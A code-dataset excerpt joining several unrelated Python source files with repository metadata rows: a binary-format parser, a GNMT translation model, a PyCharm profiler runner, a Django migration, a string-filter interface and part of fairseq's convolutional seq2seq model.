data.push_offset_and_seek(offset, SEEK_END)
offset_pushed = True
elif offset_base == "curr":
# Offset from the current file position
data.push_offset_and_seek(offset, SEEK_CUR)
offset_pushed = True
else:
raise ValueError(
'"attr_offset_whence" can be one of "item", '
'"file", "eof", "curr" (defaults to "file")'
)
else:
# Default to offset from the start of the file
data.push_offset_and_seek(offset, SEEK_SET)
offset_pushed = True
if "debug" in item:
print("%#8.8x: %s" % (self.__offset, item["debug"]))
continue
if "switch" in item:
if "cases" not in item:
raise ValueError(
'items with a "switch" key/value pair, '
'must have a "cases" key/value pair'
)
cases = item["cases"]
switch_value = getattr(self, item["switch"])
if switch_value in cases:
case_items = cases[switch_value]
elif "default" in cases:
case_items = cases["default"]
else:
raise ValueError("unhandled switch value %s" % (str(switch_value)))
self.extract_items(case_items, data)
continue
# Check if this item is just an alignment directive?
condition_passed = True
if "condition" in item:
condition_passed = item["condition"](self, data)
if "align" in item:
if condition_passed:
data.align_to(item["align"])
count = self.read_count_from_item(item)
value_fixup = None
# If there is a value fixup key, then call the function with the
# data and the value. The return value will be a fixed up value
# and the function also has the ability to modify the data stream
# (set the byte order, address byte size, etc).
if "value_fixup" in item:
value_fixup = item["value_fixup"]
if "attr_offset_size" in item:
# the number of items is inferred by parsing up until
# attr_offset + attr_offset_size, so we create a new
# FileExtract object that only contains the data we need and
# extract using that data.
attr_offset_size = getattr(self, item["attr_offset_size"])
item_data = data.read_data(attr_offset_size)
if item_data is None:
raise ValueError("failed to get item data")
value = self.decode_value(
item_data, item, condition_passed, value_fixup
)
else:
if count is None:
value = self.decode_value(data, item, condition_passed, value_fixup)
else:
value = []
for _ in range(count):
value.append(
self.decode_value(data, item, condition_passed, value_fixup)
)
if "validate" in item:
error = item["validate"](value)
if error is not None:
raise ValueError("error: %s" % (error))
if "name" in item and value is not None:
name = item["name"]
setattr(self, name, value)
name_len = len(name)
if self.max_name_len < name_len:
self.max_name_len = name_len
if offset_pushed:
data.pop_offset_and_seek()
def decode_value(self, data, item, condition_passed, value_fixup):
# If the item has a 'condition' key, then this is a function
# that we pass "self" to in order to determine if this value
# is available. If the callback returns False, then we set the
# value to the default value
read_value = True
if not condition_passed:
if "default" in item:
v = item["default"]
else:
v = None
read_value = False
if read_value:
if "type" in item:
v = self.read_type(data, item)
elif "class" in item:
v = item["class"](data)
elif "decode" in item:
v = item["decode"](data)
else:
raise ValueError(
'item definitions must have a "type" or '
'"class" or "decode" field'
)
# Let the item fixup each value if needed and possibly
# adjust the byte size or byte order.
if value_fixup is not None:
v = value_fixup(data, v)
return v
def dump_item(self, prefix, f, item, print_name, parent_path, flat):
if "switch" in item:
cases = item["cases"]
switch_value = getattr(self, item["switch"])
if switch_value in cases:
case_items = cases[switch_value]
elif "default" in cases:
case_items = cases["default"]
for case_item in case_items:
self.dump_item(prefix, f, case_item, print_name, parent_path, flat)
return
# We skip printing an item if any of the following are true:
# - If there is no name (padding)
# - If there is a 'dump' value key/value pair with False as the value
if "name" not in item or "dump" in item and item["dump"] is False:
return
name = item["name"]
if not hasattr(self, name):
return
value = getattr(self, name)
value_is_list = type(value) is list
# If flat is None set its value automatically
if flat is None:
flat = self.get_dump_flat()
if value_is_list:
if "table_header" in item:
table_header = item["table_header"]
f.write(table_header)
if not last_char_is_newline(table_header):
f.write("\n")
print_name = False
flat = True
if prefix is None:
prefix = self.get_dump_prefix()
flat_list = value_is_list and "flat" in item and item["flat"]
if prefix and flat_list is False:
f.write(prefix)
if print_name:
if not flat_list:
if flat:
f.write(name)
f.write("=")
else:
f.write("%-*s" % (self.max_name_len, name))
f.write(" = ")
if "dump" in item:
item["dump"](value, f)
return
elif "dump_list" in item:
item["dump_list"](value, prefix, flat, f)
return
else:
if value_is_list:
if parent_path is None:
item_path = name
else:
item_path = parent_path + "." + name
self.dump_values(f, item, value, print_name, item_path, prefix)
else:
if "dump_width" in item:
dump_width = item["dump_width"]
strm = StringIO()
self.dump_value(strm, item, value, print_name, parent_path)
s = strm.getvalue()
f.write(s)
s_len = len(s)
if s_len < dump_width:
f.write(" " * (dump_width - s_len))
else:
self.dump_value(f, item, value, print_name, parent_path)
if not flat_list:
if flat:
f.write(" ")
else:
f.write("\n")
def dump_value(self, f, item, value, print_name, parent_path):
if value is None:
f.write("<NULL>")
return
if "stringify" in item:
f.write("%s" % item["stringify"](value))
return
if "type" in item:
itemtype = item["type"]
if "format" in item:
format = item["format"]
elif itemtype in self.default_formats:
format = self.default_formats[itemtype]
else:
format = None
if format:
f.write(format % (value))
else:
if itemtype.startswith("cstr"):
f.write('"')
f.write(hex_escape(value))
f.write('"')
else:
f.write(str(value))
elif "class" in item:
value.dump(prefix=None, print_name=print_name, f=f, parent_path=parent_path)
else:
raise ValueError(
"item's with names must have a 'type' or " "'class' key/value pair"
)
def dump_values(self, f, item, values, print_name, parent_path, prefix):
if len(values) == 0:
if "flat" in item and item["flat"]:
if prefix:
f.write(prefix)
if parent_path:
f.write(parent_path)
f.write("[]\n")
return
flat = self.get_dump_flat()
if flat is False and "flat" in item:
flat = item["flat"]
count = len(values)
if count > 0:
index_width = 1
w = count
while w > 10:
index_width += 1
w /= 10
if isinstance(values[0], AutoParser):
first = values[0]
table_header_lines = first.get_list_header_lines()
if table_header_lines:
f.write("\n")
print_name = False
flat = True
for line in table_header_lines:
f.write(" " * (index_width + 3))
f.write(line)
index_format = "[%%%uu]" % (index_width)
if prefix is None:
prefix = ""
for (i, value) in enumerate(values):
if flat:
if prefix:
f.write(prefix)
if parent_path:
f.write(parent_path)
f.write(index_format % (i))
f.write(" = ")
else:
format = "\n%s%s" + index_format + "\n"
f.write(format % (prefix, parent_path, i))
self.dump_value(f, item, value, print_name, parent_path)
f.write("\n")
def dump(
self, prefix=None, f=sys.stdout, print_name=True, parent_path=None, flat=None
):
header = self.get_dump_header()
if header:
f.write(header)
if not last_char_is_newline(header):
f.write("\n")
for item in self.items:
self.dump_item(prefix, f, item, print_name, parent_path, flat)
def read_count_from_item(self, item):
if "attr_count" in item:
# If 'attr_count' is in the dictionary. If so, it means that
# there is already an attribute in this object that has the
# count in it and we should ready that many of the type
count = getattr(self, item["attr_count"])
# If there is an 'attr_count_fixup' key, it is a function that
# will fixup the count value
if "attr_count_fixup" in item:
count = item["attr_count_fixup"](count)
return count
elif "count" in item:
return item["count"]
return None
def read_builtin_type(self, data, typename, item):
if typename in self.read_value_callbacks:
return self.read_value_callbacks[typename](data)
if typename == "cstr":
count = self.read_count_from_item(item)
if count is None:
return data.get_c_string()
else:
return data.get_fixed_length_c_string(count)
if typename == "bytes":
if "attr_size" in item:
size = getattr(self, item["attr_size"])
return data.read_size(size)
else:
raise ValueError(
"'bytes' must have either a 'count' or a "
"'attr_count' key/value pair"
)
raise ValueError("invalid 'type' value %s" % (typename))
def read_type(self, data, item):
typename = item["type"]
if "[" in typename:
match = self.type_regex.match(typename)
if not match:
raise ValueError(
"item type array must be a valid type "
"followed by [] with a decimal number "
"as the size"
)
basetype = match.group(1)
count = int(match.group(2))
if basetype == "cstr":
return data.get_fixed_length_c_string(count)
result = []
for _ in range(count):
result.append(self.read_builtin_type(data, basetype, item))
return result
else:
return self.read_builtin_type(data, typename, item)
| [
"[email protected]"
] | |
63f26a8db8b11444b2c37dda05f8b04c536308c0 | 5fe709d0643394168dd919bbc721adabebe60a97 | /profiler/translation/seq2seq/models/gnmt.py | b3bc9147c44775f20a46b6cbce1d24d4ee9b4917 | [
"MIT"
] | permissive | vibhatha/pipedream | 8232b67366a0dd84e41fd496c9b2e8b86dbfdd89 | af6b811f5d01a68e9eb91065e5242fc1a075f279 | refs/heads/master | 2020-12-20T18:21:35.337352 | 2020-07-06T04:54:23 | 2020-07-06T04:54:23 | 236,167,878 | 0 | 0 | MIT | 2020-01-25T12:34:04 | 2020-01-25T12:34:03 | null | UTF-8 | Python | false | false | 2,830 | py | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import torch.nn as nn
from mlperf_compliance import mlperf_log
from seq2seq.utils import gnmt_print
import seq2seq.data.config as config
from seq2seq.models.seq2seq_base import Seq2Seq
from seq2seq.models.encoder import ResidualRecurrentEncoder
from seq2seq.models.decoder import ResidualRecurrentDecoder
import torchmodules.torchgraph as torchgraph
class GNMT(Seq2Seq):
"""
GNMT v2 model
"""
def __init__(self, vocab_size, hidden_size=512, num_layers=8, bias=True,
dropout=0.2, batch_first=False, math='fp32',
share_embedding=False):
"""
Constructor for the GNMT v2 model.
:param vocab_size: size of vocabulary (number of tokens)
:param hidden_size: internal hidden size of the model
:param num_layers: number of layers, applies to both encoder and
decoder
:param bias: globally enables or disables bias in encoder and decoder
:param dropout: probability of dropout (in encoder and decoder)
:param batch_first: if True the model uses (batch,seq,feature) tensors,
if false the model uses (seq, batch, feature)
:param math: arithmetic type, 'fp32' or 'fp16'
:param share_embedding: if True embeddings are shared between encoder
and decoder
"""
super(GNMT, self).__init__(batch_first=batch_first)
gnmt_print(key=mlperf_log.MODEL_HP_NUM_LAYERS,
value=num_layers)
gnmt_print(key=mlperf_log.MODEL_HP_HIDDEN_SIZE,
value=hidden_size)
gnmt_print(key=mlperf_log.MODEL_HP_DROPOUT,
value=dropout)
if share_embedding:
embedder = nn.Embedding(vocab_size, hidden_size, padding_idx=config.PAD)
else:
embedder = None
self.encoder = ResidualRecurrentEncoder(vocab_size, hidden_size,
num_layers, bias, dropout,
batch_first, embedder)
self.decoder = ResidualRecurrentDecoder(vocab_size, hidden_size,
num_layers, bias, dropout,
batch_first, math, embedder)
def forward(self, input_encoder, input_enc_len, input_decoder):
context = self.encode(input_encoder, input_enc_len)
hidden = None
if isinstance(context, torchgraph.TensorWrapper):
hidden = torchgraph.TensorWrapper(hidden, "hidden", context.graph_creator)
context = (context, input_enc_len, hidden)
output, _, _ = self.decode(input_decoder, context)
return output
| [
"[email protected]"
] | |
b221ad4641f6d3b0f304e77820b72eeb21327c1a | f4bf81d4e80468331a09401dbaeef12465aca853 | /lib/python/helpers/profiler/run_profiler.py | d1054a5f28c84804105642bc0bdc2a81ea369adb | [] | no_license | nottyo/intellibot | 45c41d673608a0a1291c6387f9d33ef449f18837 | 0547d987deaad90260abe33db5284eae9704eb9b | refs/heads/master | 2020-12-30T23:59:29.795725 | 2017-04-10T07:53:59 | 2017-04-10T07:53:59 | 86,574,980 | 1 | 0 | null | 2017-03-29T11:37:54 | 2017-03-29T11:37:53 | null | UTF-8 | Python | false | false | 5,121 | py | import os
import sys
import time
import traceback
from socket import AF_INET
from socket import SOCK_STREAM
from socket import socket
from _prof_imports import ProfilerResponse
from prof_io import ProfWriter, ProfReader
from prof_util import generate_snapshot_filepath, stats_to_response, get_snapshot_basepath, save_main_module, execfile
base_snapshot_path = os.getenv('PYCHARM_SNAPSHOT_PATH')
remote_run = bool(os.getenv('PYCHARM_REMOTE_RUN', ''))
def StartClient(host, port):
""" connects to a host/port """
s = socket(AF_INET, SOCK_STREAM)
MAX_TRIES = 100
i = 0
while i < MAX_TRIES:
try:
s.connect((host, port))
except:
i += 1
time.sleep(0.2)
continue
return s
sys.stderr.write("Could not connect to %s: %s\n" % (host, port))
sys.stderr.flush()
traceback.print_exc()
sys.exit(1) # TODO: is it safe?
class Profiler(object):
def __init__(self):
try:
import vmprof_profiler
self.profiling_backend = vmprof_profiler.VmProfProfile()
self.profiling_backend.basepath = get_snapshot_basepath(base_snapshot_path, remote_run)
print('Starting vmprof profiler\n')
except ImportError:
try:
import yappi_profiler
self.profiling_backend = yappi_profiler.YappiProfile()
print('Starting yappi profiler\n')
except ImportError:
import cProfile
self.profiling_backend = cProfile.Profile()
print('Starting cProfile profiler\n')
def connect(self, host, port):
s = StartClient(host, port)
self.initializeNetwork(s)
def initializeNetwork(self, sock):
try:
sock.settimeout(None) # infinite, no timeouts from now on - jython does not have it
except:
pass
self.writer = ProfWriter(sock)
self.reader = ProfReader(sock, self)
self.reader.start()
time.sleep(0.1) # give threads time to start
def process(self, message):
if hasattr(message, 'save_snapshot'):
self.save_snapshot(message.id, generate_snapshot_filepath(message.save_snapshot.filepath, remote_run, self.snapshot_extension()), remote_run)
else:
raise AssertionError("Unknown request %s" % dir(message))
def run(self, file):
m = save_main_module(file, 'run_profiler')
globals = m.__dict__
try:
globals['__builtins__'] = __builtins__
except NameError:
pass # Not there on Jython...
self.start_profiling()
try:
execfile(file, globals, globals) # execute the script
finally:
self.stop_profiling()
self.save_snapshot(0, generate_snapshot_filepath(base_snapshot_path, remote_run, self.snapshot_extension()), remote_run)
def start_profiling(self):
self.profiling_backend.enable()
def stop_profiling(self):
self.profiling_backend.disable()
def get_stats(self):
self.profiling_backend.create_stats()
return self.profiling_backend.stats
def has_tree_stats(self):
return hasattr(self.profiling_backend, 'tree_stats_to_response')
def tree_stats_to_response(self, filename, response):
return self.profiling_backend.tree_stats_to_response(filename, response)
def snapshot_extension(self):
if hasattr(self.profiling_backend, 'snapshot_extension'):
return self.profiling_backend.snapshot_extension()
return '.pstat'
def dump_snapshot(self, filename):
dir = os.path.dirname(filename)
if not os.path.exists(dir):
os.makedirs(dir)
self.profiling_backend.dump_stats(filename)
return filename
def save_snapshot(self, id, filename, send_stat=False):
self.stop_profiling()
if filename is not None:
filename = self.dump_snapshot(filename)
print('Snapshot saved to %s' % filename)
if not send_stat:
response = ProfilerResponse(id=id, snapshot_filepath=filename)
else:
response = ProfilerResponse(id=id)
stats_to_response(self.get_stats(), response)
if self.has_tree_stats():
self.tree_stats_to_response(filename, response)
self.writer.addCommand(response)
self.start_profiling()
if __name__ == '__main__':
host = sys.argv[1]
port = int(sys.argv[2])
file = sys.argv[3]
del sys.argv[0]
del sys.argv[0]
del sys.argv[0]
profiler = Profiler()
try:
profiler.connect(host, port)
except:
sys.stderr.write("Could not connect to %s: %s\n" % (host, port))
traceback.print_exc()
sys.exit(1)
# add file path to sys.path
sys.path.insert(0, os.path.split(file)[0])
profiler.run(file)
| [
"[email protected]"
] | |
e54de02e976647aa74f068b06084f0e6aa09524f | 0e60ed9251cd6e2ccc9645c45783a53fdabc22aa | /backend/home/migrations/0003_auto_20200613_0652.py | 3f900f39b9ebe293952dd7350fd52cfd4ad1297b | [] | no_license | crowdbotics-apps/mobile-13-dev-5964 | 7b522691afd94b4e7662ba5244abb1a8ab6768a3 | dee9594b7a96748c4c729d77145a01c592339e01 | refs/heads/master | 2022-10-22T08:47:30.634185 | 2020-06-13T07:29:34 | 2020-06-13T07:29:34 | 271,942,482 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 972 | py | # Generated by Django 2.2.13 on 2020-06-13 06:52
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("home", "0002_load_initial_data"),
]
operations = [
migrations.AddField(
model_name="customtext",
name="caasdc",
field=models.ManyToManyField(
blank=True, related_name="customtext_caasdc", to="home.HomePage"
),
),
migrations.AddField(
model_name="customtext",
name="sacscs",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="customtext_sacscs",
to=settings.AUTH_USER_MODEL,
),
),
]
| [
"[email protected]"
] | |
a72bf1e2b39f2476cd8b658a62118d236cf164a7 | 4f026ddcf8f058d884f15259f0e42c2178eb2157 | /roomlistwatcher/common/messaging/filters.py | 787b395ad5017aa059aacbf980e915a82a2ffff0 | [
"MIT"
] | permissive | dnguyen0304/roomlistwatcher | afd95e5f601f77fc8d7c4cd4307e60f36b53162c | 7ac4d5172de22dd8906662da521995c8e06c2617 | refs/heads/master | 2021-01-20T22:55:04.289589 | 2017-11-16T04:09:49 | 2017-11-16T04:09:49 | 101,829,306 | 0 | 0 | null | 2017-11-16T04:09:49 | 2017-08-30T02:38:56 | Python | UTF-8 | Python | false | false | 382 | py | # -*- coding: utf-8 -*-
import abc
class StringFilter(object):
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def filter(self, string):
"""
Parameters
----------
string : str
Returns
-------
str
If the data should not be filtered. Otherwise None.
"""
raise NotImplementedError
| [
"[email protected]"
] | |
b23f2e5fe1e974e3f9b11f5b20f431a35ee516d3 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/nlp/FairSeq_Transformer_ID0496_for_PyTorch/fairseq/models/fconv.py | 3d524589bb9294a89f9681571921b19673ccb18c | [
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 29,338 | py | #
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from fairseq import utils
from fairseq.models import (
FairseqEncoder,
FairseqIncrementalDecoder,
FairseqEncoderDecoderModel,
register_model,
register_model_architecture,
)
from fairseq.modules import (
AdaptiveSoftmax, BeamableMM, GradMultiply, LearnedPositionalEmbedding,
LinearizedConvolution,
)
@register_model('fconv')
class FConvModel(FairseqEncoderDecoderModel):
"""
A fully convolutional model, i.e. a convolutional encoder and a
convolutional decoder, as described in `"Convolutional Sequence to Sequence
Learning" (Gehring et al., 2017) <https://arxiv.org/abs/1705.03122>`_.
Args:
encoder (FConvEncoder): the encoder
decoder (FConvDecoder): the decoder
The Convolutional model provides the following named architectures and
command-line arguments:
.. argparse::
:ref: fairseq.models.fconv_parser
:prog:
"""
@classmethod
def hub_models(cls):
def moses_subword(path):
return {
'path': path,
'tokenizer': 'moses',
'bpe': 'subword_nmt',
}
return {
'conv.wmt14.en-fr': moses_subword('https://dl.fbaipublicfiles.com/fairseq/models/wmt14.v2.en-fr.fconv-py.tar.bz2'),
'conv.wmt14.en-de': moses_subword('https://dl.fbaipublicfiles.com/fairseq/models/wmt14.en-de.fconv-py.tar.bz2'),
'conv.wmt17.en-de': moses_subword('https://dl.fbaipublicfiles.com/fairseq/models/wmt17.v2.en-de.fconv-py.tar.bz2'),
}
def __init__(self, encoder, decoder):
super().__init__(encoder, decoder)
self.encoder.num_attention_layers = sum(layer is not None for layer in decoder.attention)
@staticmethod
def add_args(parser):
"""Add model-specific arguments to the parser."""
# fmt: off
parser.add_argument('--dropout', type=float, metavar='D',
help='dropout probability')
parser.add_argument('--encoder-embed-dim', type=int, metavar='N',
help='encoder embedding dimension')
parser.add_argument('--encoder-embed-path', type=str, metavar='STR',
help='path to pre-trained encoder embedding')
parser.add_argument('--encoder-layers', type=str, metavar='EXPR',
help='encoder layers [(dim, kernel_size), ...]')
parser.add_argument('--decoder-embed-dim', type=int, metavar='N',
help='decoder embedding dimension')
parser.add_argument('--decoder-embed-path', type=str, metavar='STR',
help='path to pre-trained decoder embedding')
parser.add_argument('--decoder-layers', type=str, metavar='EXPR',
help='decoder layers [(dim, kernel_size), ...]')
parser.add_argument('--decoder-out-embed-dim', type=int, metavar='N',
help='decoder output embedding dimension')
parser.add_argument('--decoder-attention', type=str, metavar='EXPR',
help='decoder attention [True, ...]')
parser.add_argument('--share-input-output-embed', action='store_true',
help='share input and output embeddings (requires'
' --decoder-out-embed-dim and --decoder-embed-dim'
' to be equal)')
# fmt: on
@classmethod
def build_model(cls, args, task):
"""Build a new model instance."""
# make sure that all args are properly defaulted (in case there are any new ones)
base_architecture(args)
encoder_embed_dict = None
if args.encoder_embed_path:
encoder_embed_dict = utils.parse_embedding(args.encoder_embed_path)
utils.print_embed_overlap(encoder_embed_dict, task.source_dictionary)
decoder_embed_dict = None
if args.decoder_embed_path:
decoder_embed_dict = utils.parse_embedding(args.decoder_embed_path)
utils.print_embed_overlap(decoder_embed_dict, task.target_dictionary)
encoder = FConvEncoder(
dictionary=task.source_dictionary,
embed_dim=args.encoder_embed_dim,
embed_dict=encoder_embed_dict,
convolutions=eval(args.encoder_layers),
dropout=args.dropout,
max_positions=args.max_source_positions,
)
decoder = FConvDecoder(
dictionary=task.target_dictionary,
embed_dim=args.decoder_embed_dim,
embed_dict=decoder_embed_dict,
convolutions=eval(args.decoder_layers),
out_embed_dim=args.decoder_out_embed_dim,
attention=eval(args.decoder_attention),
dropout=args.dropout,
max_positions=args.max_target_positions,
share_embed=args.share_input_output_embed,
)
return FConvModel(encoder, decoder)
class FConvEncoder(FairseqEncoder):
"""
Convolutional encoder consisting of `len(convolutions)` layers.
Args:
dictionary (~fairseq.data.Dictionary): encoding dictionary
embed_dim (int, optional): embedding dimension
embed_dict (str, optional): filename from which to load pre-trained
embeddings
max_positions (int, optional): maximum supported input sequence length
convolutions (list, optional): the convolutional layer structure. Each
list item `i` corresponds to convolutional layer `i`. Layers are
given as ``(out_channels, kernel_width, [residual])``. Residual
connections are added between layers when ``residual=1`` (which is
the default behavior).
dropout (float, optional): dropout to be applied before each conv layer
"""
def __init__(
self, dictionary, embed_dim=512, embed_dict=None, max_positions=1024,
convolutions=((512, 3),) * 20, dropout=0.1,
):
super().__init__(dictionary)
self.dropout = dropout
self.num_attention_layers = None
num_embeddings = len(dictionary)
self.padding_idx = dictionary.pad()
self.embed_tokens = Embedding(num_embeddings, embed_dim, self.padding_idx)
if embed_dict:
self.embed_tokens = utils.load_embedding(embed_dict, self.dictionary, self.embed_tokens)
self.embed_positions = PositionalEmbedding(
max_positions,
embed_dim,
self.padding_idx,
)
convolutions = extend_conv_spec(convolutions)
in_channels = convolutions[0][0]
self.fc1 = Linear(embed_dim, in_channels, dropout=dropout)
self.projections = nn.ModuleList()
self.convolutions = nn.ModuleList()
self.residuals = []
layer_in_channels = [in_channels]
for _, (out_channels, kernel_size, residual) in enumerate(convolutions):
if residual == 0:
residual_dim = out_channels
else:
residual_dim = layer_in_channels[-residual]
self.projections.append(Linear(residual_dim, out_channels)
if residual_dim != out_channels else None)
if kernel_size % 2 == 1:
padding = kernel_size // 2
else:
padding = 0
self.convolutions.append(
ConvTBC(in_channels, out_channels * 2, kernel_size,
dropout=dropout, padding=padding)
)
self.residuals.append(residual)
in_channels = out_channels
layer_in_channels.append(out_channels)
self.fc2 = Linear(in_channels, embed_dim)
def forward(self, src_tokens, src_lengths):
"""
Args:
src_tokens (LongTensor): tokens in the source language of shape
`(batch, src_len)`
src_lengths (LongTensor): lengths of each source sentence of shape
`(batch)`
Returns:
dict:
- **encoder_out** (tuple): a tuple with two elements, where the
first element is the last encoder layer's output and the
second element is the same quantity summed with the input
embedding (used for attention). The shape of both tensors is
`(batch, src_len, embed_dim)`.
- **encoder_padding_mask** (ByteTensor): the positions of
padding elements of shape `(batch, src_len)`
"""
# embed tokens and positions
x = self.embed_tokens(src_tokens) + self.embed_positions(src_tokens)
x = F.dropout(x, p=self.dropout, training=self.training)
input_embedding = x
# project to size of convolution
x = self.fc1(x)
# used to mask padding in input
encoder_padding_mask = src_tokens.eq(self.padding_idx).t() # -> T x B
if not encoder_padding_mask.any():
encoder_padding_mask = None
# B x T x C -> T x B x C
x = x.transpose(0, 1)
residuals = [x]
# temporal convolutions
for proj, conv, res_layer in zip(self.projections, self.convolutions, self.residuals):
if res_layer > 0:
residual = residuals[-res_layer]
residual = residual if proj is None else proj(residual)
else:
residual = None
if encoder_padding_mask is not None:
x = x.masked_fill(encoder_padding_mask.unsqueeze(-1), 0)
x = F.dropout(x, p=self.dropout, training=self.training)
if conv.kernel_size[0] % 2 == 1:
# padding is implicit in the conv
x = conv(x)
else:
padding_l = (conv.kernel_size[0] - 1) // 2
padding_r = conv.kernel_size[0] // 2
x = F.pad(x, (0, 0, 0, 0, padding_l, padding_r))
x = conv(x)
x = F.glu(x, dim=2)
if residual is not None:
x = (x + residual) * math.sqrt(0.5)
residuals.append(x)
# T x B x C -> B x T x C
x = x.transpose(1, 0)
# project back to size of embedding
x = self.fc2(x)
if encoder_padding_mask is not None:
encoder_padding_mask = encoder_padding_mask.t() # -> B x T
x = x.masked_fill(encoder_padding_mask.unsqueeze(-1), 0)
# scale gradients (this only affects backward, not forward)
x = GradMultiply.apply(x, 1.0 / (2.0 * self.num_attention_layers))
# add output to input embedding for attention
y = (x + input_embedding) * math.sqrt(0.5)
return {
'encoder_out': (x, y),
'encoder_padding_mask': encoder_padding_mask, # B x T
}
def reorder_encoder_out(self, encoder_out, new_order):
if encoder_out['encoder_out'] is not None:
encoder_out['encoder_out'] = (
encoder_out['encoder_out'][0].index_select(0, new_order),
encoder_out['encoder_out'][1].index_select(0, new_order),
)
if encoder_out['encoder_padding_mask'] is not None:
encoder_out['encoder_padding_mask'] = \
encoder_out['encoder_padding_mask'].index_select(0, new_order)
return encoder_out
def max_positions(self):
"""Maximum input length supported by the encoder."""
return self.embed_positions.max_positions()
class AttentionLayer(nn.Module):
def __init__(self, conv_channels, embed_dim, bmm=None):
super().__init__()
# projects from output of convolution to embedding dimension
self.in_projection = Linear(conv_channels, embed_dim)
# projects from embedding dimension to convolution size
self.out_projection = Linear(embed_dim, conv_channels)
self.bmm = bmm if bmm is not None else torch.bmm
def forward(self, x, target_embedding, encoder_out, encoder_padding_mask):
residual = x
# attention
x = (self.in_projection(x) + target_embedding) * math.sqrt(0.5)
x = self.bmm(x, encoder_out[0])
# don't attend over padding
if encoder_padding_mask is not None:
x = x.float().masked_fill(
encoder_padding_mask.unsqueeze(1),
float('-inf')
).type_as(x) # FP16 support: cast to float and back
# softmax over last dim
sz = x.size()
x = F.softmax(x.view(sz[0] * sz[1], sz[2]), dim=1)
x = x.view(sz)
attn_scores = x
x = self.bmm(x, encoder_out[1])
# scale attention output (respecting potentially different lengths)
s = encoder_out[1].size(1)
if encoder_padding_mask is None:
x = x * (s * math.sqrt(1.0 / s))
else:
s = s - encoder_padding_mask.type_as(x).sum(dim=1, keepdim=True) # exclude padding
s = s.unsqueeze(-1)
x = x * (s * s.rsqrt())
# project back
x = (self.out_projection(x) + residual) * math.sqrt(0.5)
return x, attn_scores
def make_generation_fast_(self, beamable_mm_beam_size=None, **kwargs):
"""Replace torch.bmm with BeamableMM."""
if beamable_mm_beam_size is not None:
del self.bmm
self.add_module('bmm', BeamableMM(beamable_mm_beam_size))
class FConvDecoder(FairseqIncrementalDecoder):
"""Convolutional decoder"""
def __init__(
self, dictionary, embed_dim=512, embed_dict=None, out_embed_dim=256,
max_positions=1024, convolutions=((512, 3),) * 20, attention=True,
dropout=0.1, share_embed=False, positional_embeddings=True,
adaptive_softmax_cutoff=None, adaptive_softmax_dropout=0,
):
super().__init__(dictionary)
self.register_buffer('version', torch.Tensor([2]))
self.dropout = dropout
self.need_attn = True
convolutions = extend_conv_spec(convolutions)
in_channels = convolutions[0][0]
if isinstance(attention, bool):
# expand True into [True, True, ...] and do the same with False
attention = [attention] * len(convolutions)
if not isinstance(attention, list) or len(attention) != len(convolutions):
raise ValueError('Attention is expected to be a list of booleans of '
'length equal to the number of layers.')
num_embeddings = len(dictionary)
padding_idx = dictionary.pad()
self.embed_tokens = Embedding(num_embeddings, embed_dim, padding_idx)
if embed_dict:
self.embed_tokens = utils.load_embedding(embed_dict, self.dictionary, self.embed_tokens)
self.embed_positions = PositionalEmbedding(
max_positions,
embed_dim,
padding_idx,
) if positional_embeddings else None
self.fc1 = Linear(embed_dim, in_channels, dropout=dropout)
self.projections = nn.ModuleList()
self.convolutions = nn.ModuleList()
self.attention = nn.ModuleList()
self.residuals = []
layer_in_channels = [in_channels]
for i, (out_channels, kernel_size, residual) in enumerate(convolutions):
if residual == 0:
residual_dim = out_channels
else:
residual_dim = layer_in_channels[-residual]
self.projections.append(Linear(residual_dim, out_channels)
if residual_dim != out_channels else None)
self.convolutions.append(
LinearizedConv1d(in_channels, out_channels * 2, kernel_size,
padding=(kernel_size - 1), dropout=dropout)
)
self.attention.append(AttentionLayer(out_channels, embed_dim)
